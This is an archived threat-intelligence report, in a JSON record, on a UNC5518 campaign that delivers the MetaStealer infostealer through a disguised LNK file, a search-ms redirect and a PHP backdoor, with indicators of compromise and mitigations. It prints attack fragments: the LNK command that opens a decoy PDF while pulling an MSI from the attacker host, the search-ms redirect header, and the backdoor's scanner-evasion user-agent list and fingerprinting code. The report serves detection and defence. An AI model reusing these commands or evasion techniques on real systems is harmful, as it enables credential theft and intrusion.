{
	"id": "ea2b6e25-7508-4822-8c43-4ed475f1eab1",
	"created_at": "2026-04-06T00:14:05.235117Z",
	"updated_at": "2026-04-10T13:11:56.52351Z",
	"deleted_at": null,
	"sha1_hash": "e26a9ed5895a9ecea7cbc30d8883a947b51314a3",
	"title": "The Phantom Threat: Inside UNC5518’s Invisible Empire of MetaStealer Operations",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 465184,
	"plain_text": "The Phantom Threat: Inside UNC5518’s Invisible Empire of\r\nMetaStealer Operations\r\nBy Defentive\r\nPublished: 2025-08-28 · Archived: 2026-04-05 14:06:32 UTC\r\nDefentive Threat Research team reveals a sophisticated attack chain combining novel Windows protocol\r\nexploitation, persistent PHP backdoors, and commercial infostealer deployment.\r\nExecutive Summary\r\nThe Defentive Threat Research team has uncovered a highly sophisticated multi-stage campaign orchestrated by\r\nUNC5518, demonstrating their evolution from access-as-a-service provider to full-spectrum threat actor. Our\r\ninvestigation, initiated by discovering a malicious LNK file ( address-validation-guidelines.pdf.lnk ),\r\nrevealed a coordinated operation deploying MetaStealer through revolutionary search-ms protocol exploitation\r\nand persistent PHP backdoor infrastructure.\r\nKey Discoveries\r\nComplete 5-stage attack chain from social engineering to persistent C2\r\nNovel abuse of Windows search-ms protocol for automatic redirection\r\nProfessional-grade PHP backdoor with 35+ anti-analysis mechanisms\r\nDomain Generation Algorithm (DGA) protected MetaStealer C2 infrastructure\r\nDefinitive attribution to UNC5518 with 98% confidence level\r\nAttack Chain Overview\r\nhttps://defentive.medium.com/the-phantom-threat-inside-unc5518s-invisible-empire-of-metastealer-operations-defentive-3c05359dcae0\r\nPage 1 of 10\r\nKill-Chain: UNC5518 Deploying MetaStealer\r\nStage 0: PHP Backdoor (Reconnaissance \u0026 Persistence)\r\n ↓\r\nStage 1: LNK Social Engineering (Initial Access)\r\n ↓\r\nStage 2: search-ms Protocol Exploitation (Windows Integration)\r\n ↓\r\nStage 3: MetaStealer MSI Deployment (Credential Harvesting)\r\n ↓\r\nStage 4: DGA-Protected C2 Communication (Command \u0026 Control)\r\nTechnical Analysis\r\nStage 0: PHP Backdoor — The Foundation\r\nThe campaign’s cornerstone is a sophisticated PHP backdoor hosted on info-ups.com:8080 that serves multiple\r\nfunctions:\r\nProfessional Authentication System\r\n$validToken = 'N6AyktWn9zw2';\r\nfunction hasValidToken($validToken) {\r\n return hash_equals($validToken, $_GET['api'] ?? '');\r\n}\r\nThe use of hash_equals() demonstrates timing attack resistance, indicating professional-grade development\r\npractices.\r\nEnterprise-Grade Anti-Analysis Framework\r\nThe backdoor implements comprehensive bot detection with 35+ patterns targeting security tools:\r\nSecurity scanners: Burp Suite, Nessus, OWASP ZAP\r\nAutomation tools: curl, wget, Postman, Python scripts\r\nSearch engine crawlers: Googlebot, Bingbot, DuckDuckGo\r\nAnalysis environments: PhantomJS, Headless Chrome, VM indicators\r\n$botPatterns = [\r\n 'bot',\r\n 'googlebot',\r\n 'bingbot',\r\n 'slurp',\r\n 'duckduckbot',\r\n 'baiduspider',\r\n 'yandex',\r\n 'sogou',\r\n 'exabot',\r\n 'facebot',\r\n 'facebookexternalhit',\r\n 'twitterbot',\r\n 'linkedinbot',\r\n 'pinterest',\r\n 'ia_archiver',\r\n 'archive.org_bot',\r\n 'semrush',\r\n 'ahrefs',\r\n 'mj12bot',\r\n 'rogerbot',\r\n 'dotbot',\r\n 'crawler',\r\n 'spider',\r\n 'curl',\r\n 'wget',\r\n 'python',\r\n 'node.js',\r\n 'phantomjs',\r\n 'headlesschrome',\r\n 'postman',\r\n 'insomnia',\r\n 'http client',\r\n 'java',\r\n 'libwww',\r\n 'perl',\r\n 'php/'\r\n];\r\nAdvanced System Reconnaissance\r\nOperating System Detection: Windows 95–11, macOS variants, Linux distributions, mobile platforms\r\n$oses = [\r\n '/iphone/i' =\u003e 'iPhone',\r\n '/ipad/i' =\u003e 'iPad',\r\n '/ipod/i' =\u003e 'iPod',\r\n '/android/i' =\u003e 'Android',\r\n '/blackberry/i' =\u003e 'BlackBerry',\r\n '/webos/i' =\u003e 'WebOS',\r\n '/windows phone/i' =\u003e 'Windows Phone',\r\n '/macintosh|mac os x/i' =\u003e 'Mac OS X',\r\n '/mac_powerpc/i' =\u003e 'Mac OS 9',\r\n '/linux/i' =\u003e 'Linux',\r\n '/ubuntu/i' =\u003e 'Ubuntu',\r\n '/windows nt 11/i' =\u003e 'Windows 11',\r\n '/windows nt 10/i' =\u003e 'Windows 10',\r\n '/windows nt 6.3/i' =\u003e 'Windows 8.1',\r\n '/windows nt 6.2/i' =\u003e 'Windows 8',\r\n '/windows nt 6.1/i' =\u003e 'Windows 7',\r\n '/windows nt 6.0/i' =\u003e 'Windows Vista',\r\n '/windows nt 5.2/i' =\u003e 'Windows Server 2003 / XP x64',\r\n '/windows nt 5.1/i' =\u003e 'Windows XP',\r\n '/windows xp/i' =\u003e 'Windows XP',\r\n '/windows nt 5.0/i' =\u003e 'Windows 2000',\r\n '/windows me/i' =\u003e 'Windows ME',\r\n '/win98/i' =\u003e 'Windows 98',\r\n '/win95/i' =\u003e 'Windows 95',\r\n '/win16/i' =\u003e 'Windows 3.11',\r\n];\r\nBrowser Fingerprinting: Chrome, Firefox, Safari, Edge with version-specific detection\r\n$browsers = [\r\n '/edg/i' =\u003e 'Edge',\r\n '/chrome/i' =\u003e 'Chrome',\r\n '/firefox/i' =\u003e 'Firefox',\r\n '/safari/i' =\u003e 'Safari',\r\n '/msie/i' =\u003e 'Internet Explorer',\r\n '/trident.*rv[ :]*11\\./i' =\u003e 'Internet Explorer',\r\n '/opera/i' =\u003e 'Opera',\r\n '/opr/i' =\u003e 'Opera',\r\n '/netscape/i' =\u003e 'Netscape',\r\n '/maxthon/i' =\u003e 'Maxthon',\r\n '/konqueror/i' =\u003e 'Konqueror',\r\n '/mobile/i' =\u003e 'Мобильный браузер',\r\n];\r\nNetwork Configuration: IP extraction through multiple HTTP headers, proxy detection\r\n$ip = '';\r\nif (!empty($_SERVER['HTTP_CLIENT_IP'])) {\r\n $ip = $_SERVER['HTTP_CLIENT_IP'];\r\n} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {\r\n $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];\r\n} elseif (!empty($_SERVER['HTTP_X_FORWARDED'])) {\r\n $ip = $_SERVER['HTTP_X_FORWARDED'];\r\n} elseif (!empty($_SERVER['HTTP_FORWARDED_FOR'])) {\r\n $ip = $_SERVER['HTTP_FORWARDED_FOR'];\r\n} elseif (!empty($_SERVER['HTTP_FORWARDED'])) {\r\n $ip = $_SERVER['HTTP_FORWARDED'];\r\n} elseif (!empty($_SERVER['REMOTE_ADDR'])) {\r\n $ip = $_SERVER['REMOTE_ADDR'];\r\n}\r\nGeographic Profiling: Location-based targeting for regional campaigns\r\nVisitor Logging: The logging mechanism writes to /var/www/logs-visits/visitor_log.txt with proper file\r\nlocking\r\n$logFile = '/var/www/logs-visits/visitor_log.txt';\r\nfile_put_contents($logFile, $logEntry, FILE_APPEND | LOCK_EX);\r\nVisitor Logs\r\nStage 1: LNK-Based Social Engineering\r\nThe malicious address-validation-guidelines.pdf.lnk file executes a sophisticated command chain:\r\n%comspec% cmd.exe /c start msedge \"https://info-ups.com/pdf/address-validation-guidelines.pdf\" \u0026\u0026 cu\r\nDeception Mechanisms\r\nLegitimate PDF Display: Opens actual document maintaining victim trust\r\nDecoy PDF To Distract The Victim\r\nSilent Payload Download: Background MSI retrieval with .ms extension for evasion\r\nsw.msi\r\nAutomated Installation: Silent deployment via /qn parameter\r\nCorporate Theming: UPS address validation targets business environments\r\nStage 2: Revolutionary search-ms Protocol Exploitation\r\nOur analysis reveals UNC5518’s novel abuse of Windows Search protocol:\r\nheader(\"Location: search-ms:displayname=Search%20Results%20in%20link%20(%5C%5Cinfo-ups.com@8080)\u0026crum\r\nTechnical Innovation\r\nAutomatic Explorer Launch: Bypasses browser security warnings\r\nUNC Path Spoofing: Exploits Windows network share trust mechanisms\r\nPersistent Windows: Creates lasting connection to attacker infrastructure\r\nProtocol Handler Abuse: Leverages legitimate Windows functionality for malicious purposes\r\nThis represents a significant evolution beyond documented search-ms exploitations, achieving automatic\r\nactivation without user confirmation prompts.\r\nStage 3: MetaStealer Deployment\r\nThe sw.msi payload delivers MetaStealer, a commercial-grade infostealer:\r\nTechnical Capabilities:\r\nSubscription-based Malware: $125/month professional service\r\nAdvanced Evasion: Microsoft Defender bypass, VM detection\r\nComprehensive Harvesting: Credentials, payment data, cryptocurrency wallets\r\nProfessional C2: RESTful API with cpp-httplib/0.12.1 User-Agent\r\nStage 4: DGA-Protected Command \u0026 Control\r\nMetaStealer C2 Domains\r\nukkuikuueauckcii.xyz\r\nukukuwgyyqyigueq.xyz\r\nkqqauykcwyuyowms.xyz\r\ngimmgqiyciskoseu.xyz\r\nDGA Analysis\r\nThe domains exhibit sophisticated generation patterns:\r\n16-character length with consistent structure\r\nLimited character set: Vowels (u,i,e,a,o) and consonants (k,c,g,w,y,m,s,q)\r\nHigh entropy design balancing randomness with algorithmic predictability\r\nResilience strategy: Multiple domains enable rapid rotation against takedowns\r\nUNC5518 Attribution (98% Confidence)\r\nPrimary Evidence\r\n1. Infrastructure Overlap: Same server hosting CORNFLAKE.V3 backdoor and MetaStealer components\r\n2. Technical Sophistication: PHP backdoor complexity matches documented UNC5518 capabilities\r\n3. Operational Timeline: Campaign timing aligns with known UNC5518 activity periods\r\n4. Professional Development: Anti-analysis mechanisms and coding standards consistent with established\r\noperations\r\n5. Multi-Payload Integration: Seamless coordination across attack stages indicates unified development\r\nSupporting Indicators\r\nUPS Brand Impersonation: Historical pattern matching documented campaigns\r\nPort 8080 Usage: Consistent with CORNFLAKE.V3 C2 infrastructure\r\nCommercial Malware Investment: MetaStealer subscription demonstrates financial resources\r\nAdvanced Protocol Exploitation: search-ms innovation consistent with UNC5518’s technical advancement\r\nUNC5518 Threat Actor Profile\r\nOrganizational Structure\r\nPrimary Operations: Access-as-a-service with affiliate partnerships\r\nKnown Affiliates: UNC5774 (CORNFLAKE.V3 deployment), UNC4108 (PowerShell tools)\r\nRevenue Model: Dual streams from access sales and direct credential monetization\r\nTechnical Capabilities: Custom malware development, DGA implementation, protocol exploitation\r\nEvolution Indicators\r\nUNC5518 has significantly expanded from traditional access provision to integrated threat operations combining:\r\nPersistent backdoor maintenance\r\nDirect information stealer deployment\r\nAdvanced infrastructure management\r\nProfessional operational security practices\r\nImmediate Mitigations\r\nDetection Implementation\r\n1. PHP Backdoor Monitoring: Behavioral analysis for visitor logging with anti-bot capabilities\r\n2. LNK File Analysis: Detection for embedded PowerShell with MSI download patterns\r\n3. search-ms Protocol Tracking: Registry monitoring for unusual Windows Search invocations\r\n4. DGA Domain Blocking: Entropy-based detection and proactive domain pattern blocking\r\n5. Multi-Stage Correlation: Rules linking LNK execution, PHP access, and MSI installation\r\nNetwork Defenses\r\nBlock identified C2 domains and implement DGA pattern detection\r\nMonitor HTTP traffic on non-standard ports (8080)\r\nDeploy DNS analysis for suspicious domain resolution patterns\r\nImplement file system integrity monitoring for unauthorized PHP files\r\nConclusion\r\nUNC5518’s sophisticated campaign demonstrates the evolution of professional threat actors toward integrated,\r\nmulti-stage operations that blur traditional attack boundaries. The combination of novel protocol exploitation,\r\npersistent backdoor capabilities, and commercial-grade malware deployment represents a paradigm shift in\r\ncybercriminal operations.\r\nThe definitive attribution to UNC5518 reveals their advancement from specialized access providers to\r\ncomprehensive threat actors capable of conducting complex, coordinated campaigns with long-term persistence\r\ncapabilities. Organizations must immediately assess exposure to these advanced techniques and implement multi-layered defenses against this emerging threat model.\r\nAs UNC5518 continues demonstrating cutting-edge technical capabilities, the cybersecurity community must\r\nrecognize this evolution and adapt defensive strategies to address the new reality of integrated, persistent threat\r\nactor operations.\r\nIndicators of Compromise (IOC)\r\nInfrastructure: info-ups.com:8080\r\nInitial Vector: address-validation-guidelines.pdf.lnk\r\n(55d95d29d54112fc203d8b2d6335031fd0ef26c56c9459f239760c24dadd3f24)\r\nBackdoor Token: N6AyktWn9zw2\r\nC2 Domains: ukkuikuueauckcii.xyz , ukukuwgyyqyigueq.xyz , kqqauykcwyuyowms.xyz ,\r\ngimmgqiyciskoseu.xyz\r\nPayload: sw.msi / sw.ms (81e0f8ea01563bac4e38392a51b2c5b4b233c11b3b28ef7a5c595c7e6f27640d)\r\nThe Defentive Threat Research team continues monitoring UNC5518 evolution and provides updated intelligence\r\non emerging threat actor capabilities.\r\nhttps://www.defentive.com/\r\nSource: https://defentive.medium.com/the-phantom-threat-inside-unc5518s-invisible-empire-of-metastealer-operations-defentive-3c05359dcae0",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://defentive.medium.com/the-phantom-threat-inside-unc5518s-invisible-empire-of-metastealer-operations-defentive-3c05359dcae0"
	],
	"report_names": [
		"the-phantom-threat-inside-unc5518s-invisible-empire-of-metastealer-operations-defentive-3c05359dcae0"
	],
	"threat_actors": [],
	"ts_created_at": 1775434445,
	"ts_updated_at": 1775826716,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e26a9ed5895a9ecea7cbc30d8883a947b51314a3.pdf",
		"text": "https://archive.orkl.eu/e26a9ed5895a9ecea7cbc30d8883a947b51314a3.txt",
		"img": "https://archive.orkl.eu/e26a9ed5895a9ecea7cbc30d8883a947b51314a3.jpg"
	}
}